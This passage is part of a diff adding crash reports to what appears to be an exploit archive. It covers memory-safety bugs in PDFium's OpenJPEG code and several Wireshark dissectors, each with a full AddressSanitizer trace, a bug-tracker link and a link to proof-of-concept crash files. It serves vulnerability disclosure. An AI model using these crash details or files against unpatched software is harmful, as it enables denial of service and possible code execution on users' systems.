CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13 + #14 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11 + #15 0xed6aaf in 
CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17 + #16 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7 + #17 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7 + #18 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10 + #19 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13 + #20 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3 + #21 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3 + #22 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3 + #23 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3 + #24 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9 + #25 0x4f16e9 in main samples/pdfium_test.cc:608:5 + +SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/libopenjpeg20/j2k.c:5378:35 in opj_j2k_read_mcc +Shadow bytes around the buggy address: + 0x0c247fff9630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c247fff9650: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff9660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff9670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c247fff9680:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff9690: 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff96a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff96b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c247fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c247fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==28048==ABORTING +--- cut --- + +The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554129. Attached are two PDF files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39322.zip + diff --git a/platforms/multiple/dos/39323.txt b/platforms/multiple/dos/39323.txt new file mode 100755 index 000000000..61f444a9b --- /dev/null +++ b/platforms/multiple/dos/39323.txt 
@@ -0,0 +1,65 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=697 + +The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==25088==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffdbb9f36e at pc 0x7f26c4ae2af4 bp 0x7fffdbb9f190 sp 0x7fffdbb9f188 +READ of size 1 at 0x7fffdbb9f36e thread T0 + #0 0x7f26c4ae2af3 in ascii_strup_inplace wireshark/wsutil/str_util.c:71:16 + #1 0x7f26d8893b1c in iseries_check_file_type wireshark/wiretap/iseries.c:336:9 + #2 0x7f26d8892a63 in iseries_open wireshark/wiretap/iseries.c:231:14 + #3 0x7f26d8864c51 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13 + #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9 + #5 0x5178cb in main wireshark/tshark.c:2188:9 + +Address 0x7fffdbb9f36e is located in stack of thread T0 at offset 302 in frame + #0 0x7f26d88934bf in iseries_check_file_type wireshark/wiretap/iseries.c:306 + + This frame has 2 object(s): + [32, 302) 'buf' <== Memory access at offset 302 overflows this variable + [368, 377) 'protocol' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wsutil/str_util.c:71:16 in ascii_strup_inplace +Shadow bytes around the buggy address: + 0x10007b76be10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76be40: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00 + 0x10007b76be50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x10007b76be60: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]f2 f2 + 0x10007b76be70: f2 f2 f2 f2 f2 f2 00 01 f3 f3 f3 f3 00 00 00 00 + 0x10007b76be80: 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 + 0x10007b76be90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10007b76bea0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 + 0x10007b76beb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==25088==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11985. Attached is a file which triggers the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39323.zip + diff --git a/platforms/multiple/dos/39324.txt b/platforms/multiple/dos/39324.txt new file mode 100755 index 000000000..0bdbb88bc --- /dev/null +++ b/platforms/multiple/dos/39324.txt 
@@ -0,0 +1,113 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=696 + +The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==24710==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe68161a6c at pc 0x0000004ab766 bp 0x7ffe681503f0 sp 0x7ffe6814fba0 +WRITE of size 120 at 0x7ffe68161a6c thread T0 + #0 0x4ab765 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 + #1 0x7ff89a5f89ec in tvb_memcpy wireshark/epan/tvbuff.c:783:10 + #2 0x7ff89b7ba95c in dissect_nhdr_extopt wireshark/epan/dissectors/packet-lbmc.c:10013:13 + #3 0x7ff89b7a1a54 in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:11039:41 + #4 0x7ff89b82ece9 in dissect_lbttcp_pdu wireshark/epan/dissectors/packet-lbttcp.c:620:21 + #5 0x7ff89c4a5254 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2762:13 + #6 0x7ff89b82c7dc in dissect_lbttcp_real wireshark/epan/dissectors/packet-lbttcp.c:642:5 + #7 0x7ff89b82ad4e in test_lbttcp_packet wireshark/epan/dissectors/packet-lbttcp.c:698:5 + #8 0x7ff89a4b1c57 in dissector_try_heuristic wireshark/epan/packet.c:2332:7 + #9 0x7ff89c4a6de0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4644:13 + #10 0x7ff89c4ac5e3 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4690:13 + #11 0x7ff89c4a765b in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4771:9 + #12 0x7ff89c4bc7f0 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5623:13 + #13 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #14 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #15 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #16 0x7ff89b5f0e0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7 + #17 0x7ff89b5fba21 in dissect_ip_v4 
wireshark/epan/dissectors/packet-ip.c:2468:10 + #18 0x7ff89b5f1569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5 + #19 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #20 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #21 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #22 0x7ff89a4aa1a4 in dissector_try_uint wireshark/epan/packet.c:1177:9 + #23 0x7ff89bdd7830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10 + #24 0x7ff89bdd6fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5 + #25 0x7ff89bdcf2a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5 + #26 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #27 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #28 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #29 0x7ff89b1e60d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11 + #30 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #31 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #32 0x7ff89a4b396e in call_dissector_only wireshark/epan/packet.c:2665:8 + #33 0x7ff89a4a53df in call_dissector_with_data wireshark/epan/packet.c:2678:8 + #34 0x7ff89a4a4a2b in dissect_record wireshark/epan/packet.c:502:3 + #35 0x7ff89a4559b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2 + #36 0x52856b in process_packet wireshark/tshark.c:3728:5 + #37 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11 + #38 0x517e2c in main wireshark/tshark.c:2197:13 + +Address 0x7ffe68161a6c is located in stack of thread T0 at offset 65644 in frame + #0 0x7ff89b79d1ff in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:10597 + + This frame has 17 object(s): + [32, 36) 'bhdr' + [48, 52) 'msgprop_len' + [64, 80) 'frag_info' + [96, 65644) 'reassembly' <== Memory access at offset 65644 
overflows this variable + [65904, 65908) 'data_is_umq_cmd_resp' + [65920, 65940) 'stream_info' + [65984, 65996) 'ctxinstd_info' + [66016, 66028) 'ctxinstr_info' + [66048, 66120) 'destination_info' + [66160, 66416) 'found_header' + [66480, 66584) 'uim_stream_info' + [66624, 66632) 'tcp_sid_info' + [66656, 66672) 'tcp_addr' + [66688, 66692) 'tcp_session_id' + [66704, 66712) 'hdtbl_entry' + [66736, 66740) 'encoding' + [66752, 66756) 'pdmlen' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy +Shadow bytes around the buggy address: + 0x10004d0242f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x10004d024330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x10004d024340: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]f2 f2 + 0x10004d024350: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 + 0x10004d024360: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 04 f2 + 0x10004d024370: 00 00 04 f2 f2 f2 f2 f2 00 04 f2 f2 00 04 f2 f2 + 0x10004d024380: 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 + 0x10004d024390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan 
internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==24710==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11984. Attached are two files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39324.zip + diff --git a/platforms/multiple/dos/39325.txt b/platforms/multiple/dos/39325.txt new file mode 100755 index 000000000..d877a5e62 --- /dev/null +++ b/platforms/multiple/dos/39325.txt 
@@ -0,0 +1,89 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=695 + +The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==24377==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f7a3ce4efe0 at pc 0x7f7a39a5a121 bp 0x7ffe1fcb92e0 sp 0x7ffe1fcb92d8 +READ of size 4 at 0x7f7a3ce4efe0 thread T0 + #0 0x7f7a39a5a120 in hiqnet_display_data wireshark/epan/dissectors/packet-hiqnet.c:523:15 + #1 0x7f7a39a59354 in dissect_hiqnet_pdu wireshark/epan/dissectors/packet-hiqnet.c:906:34 + #2 0x7f7a39a560b7 in dissect_hiqnet_udp wireshark/epan/dissectors/packet-hiqnet.c:1031:9 + #3 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #4 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #5 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #6 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9 + #7 0x7f7a3abc065d in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:536:7 + #8 0x7f7a3abce912 in dissect wireshark/epan/dissectors/packet-udp.c:1031:5 + #9 0x7f7a3abc31a0 in dissect_udplite wireshark/epan/dissectors/packet-udp.c:1044:3 + #10 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #11 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #12 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #13 0x7f7a39beae0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7 + #14 0x7f7a39bf5a21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10 + #15 0x7f7a39beb569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5 + #16 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #17 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #18 0x7f7a38aa35fd in 
dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #19 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9 + #20 0x7f7a3a3d1830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10 + #21 0x7f7a3a3d0fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5 + #22 0x7f7a3a3c92a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5 + #23 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #24 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #25 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9 + #26 0x7f7a397e00d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11 + #27 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8 + #28 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9 + #29 0x7f7a38aad96e in call_dissector_only wireshark/epan/packet.c:2665:8 + #30 0x7f7a38a9f3df in call_dissector_with_data wireshark/epan/packet.c:2678:8 + #31 0x7f7a38a9ea2b in dissect_record wireshark/epan/packet.c:502:3 + #32 0x7f7a38a4f9b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2 + #33 0x52856b in process_packet wireshark/tshark.c:3728:5 + #34 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11 + #35 0x517e2c in main wireshark/tshark.c:2197:13 + +0x7f7a3ce4efe0 is located 32 bytes to the left of global variable '' defined in 'packet-hiqnet.c' (0x7f7a3ce4f000) of size 16 + '' is ascii string 'packet-hiqnet.c' +0x7f7a3ce4efe0 is located 16 bytes to the right of global variable 'hiqnet_datasize_per_type' defined in 'packet-hiqnet.c:282:19' (0x7f7a3ce4efa0) of size 48 +SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-hiqnet.c:523:15 in hiqnet_display_data +Shadow bytes around the buggy address: + 0x0fefc79c1da0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 + 0x0fefc79c1db0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 05 f9 f9 + 0x0fefc79c1dc0: f9 f9 f9 
f9 00 02 f9 f9 f9 f9 f9 f9 00 00 f9 f9 + 0x0fefc79c1dd0: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9 + 0x0fefc79c1de0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 04 f9 f9 +=>0x0fefc79c1df0: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9[f9]f9 f9 f9 + 0x0fefc79c1e00: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 + 0x0fefc79c1e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0fefc79c1e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0fefc79c1e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0fefc79c1e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11983. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39325.zip + diff --git a/platforms/multiple/dos/39326.txt b/platforms/multiple/dos/39326.txt new file mode 100755 index 000000000..83e583d60 --- /dev/null +++ b/platforms/multiple/dos/39326.txt 
@@ -0,0 +1,64 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=694 + +The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==23220==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffc04c9c20 at pc 0x00000046cc29 bp 0x7fffc04c99b0 sp 0x7fffc04c9160 +READ of size 515 at 0x7fffc04c9c20 thread T0 + #0 0x46cc28 in StrstrCheck(void*, char*, char const*, char const*) llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314 + #1 0x46d0f7 in __interceptor_strstr llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:328 + #2 0x7fbfa4361585 in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:986:13 + #3 0x7fbfa429fc7c in wtap_open_offline wireshark/wiretap/file_access.c:913:11 + #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9 + #5 0x5178cb in main wireshark/tshark.c:2188:9 + +Address 0x7fffc04c9c20 is located in stack of thread T0 at offset 544 in frame + #0 0x7fbfa43611ff in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:964 + + This frame has 1 object(s): + [32, 544) 'magic_buf' <== Memory access at offset 544 overflows this variable +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314 in StrstrCheck(void*, char*, char const*, char const*) +Shadow bytes around the buggy address: + 0x100078091330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091340: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x100078091360: 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 + 0x100078091370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x100078091380: 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00 + 0x100078091390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x1000780913d0: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==23220==ABORTING +--- cut --- + +The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11982. Attached are three files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39326.zip + diff --git a/platforms/multiple/dos/39327.txt b/platforms/multiple/dos/39327.txt new file mode 100755 index 000000000..b43f13f51 --- /dev/null +++ b/platforms/multiple/dos/39327.txt 
@@ -0,0 +1,133 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=659 + +The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): + +--- cut --- +==6953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdbb5647800 at pc 0x7fdd101b5365 bp 0x7ffee2b92610 sp 0x7ffee2b92608 +READ of size 1 at 0x7fdbb5647800 thread T0 + #0 0x7fdd101b5364 in dissect_ber_constrained_bitstring wireshark/epan/dissectors/packet-ber.c:3990:17 + #1 0x7fdd101b5a56 in dissect_ber_bitstring wireshark/epan/dissectors/packet-ber.c:4016:10 + #2 0x7fdd1277c345 in dissect_ns_cert_exts_CertType wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:93:12 + #3 0x7fdd1277b3fe in dissect_CertType_PDU wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:155:12 + #4 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #5 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #6 0x7fdd0fcba02d in dissector_try_string wireshark/epan/packet.c:1443:9 + #7 0x7fdd1019276b in call_ber_oid_callback wireshark/epan/dissectors/packet-ber.c:1096:17 + #8 0x7fdd12bd0192 in dissect_x509af_T_extnValue wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:138:10 + #9 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #10 0x7fdd12bcd47d in dissect_x509af_Extension wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:155:12 + #11 0x7fdd101ae695 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9 + #12 0x7fdd101aea3b in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12 + #13 0x7fdd12bcd52d in dissect_x509af_Extensions wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:168:12 + #14 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #15 
0x7fdd12bd02af in dissect_x509af_T_signedCertificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:191:12 + #16 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17 + #17 0x7fdd12bcd5dd in dissect_x509af_Certificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:218:12 + #18 0x7fdd11c08b83 in ssl_dissect_hnd_cert wireshark/epan/dissectors/packet-ssl-utils.c:5958:21 + #19 0x7fdd11c21752 in dissect_ssl3_handshake wireshark/epan/dissectors/packet-ssl.c:1930:17 + #20 0x7fdd11c1a71b in dissect_ssl3_record wireshark/epan/dissectors/packet-ssl.c:1619:13 + #21 0x7fdd11c14e12 in dissect_ssl wireshark/epan/dissectors/packet-ssl.c:723:26 + #22 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #23 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #24 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #25 0x7fdd11c697d0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9 + #26 0x7fdd11c6f043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13 + #27 0x7fdd11c6bbed in desegment_tcp wireshark/epan/dissectors/packet-tcp.c:2260:9 + #28 0x7fdd11c6a24e in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4735:9 + #29 0x7fdd11c7f7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13 + #30 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #31 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #32 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + #33 0x7fdd10dc588b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7 + #34 0x7fdd10dd02b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10 + #35 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 + #36 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9 + #37 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 + 
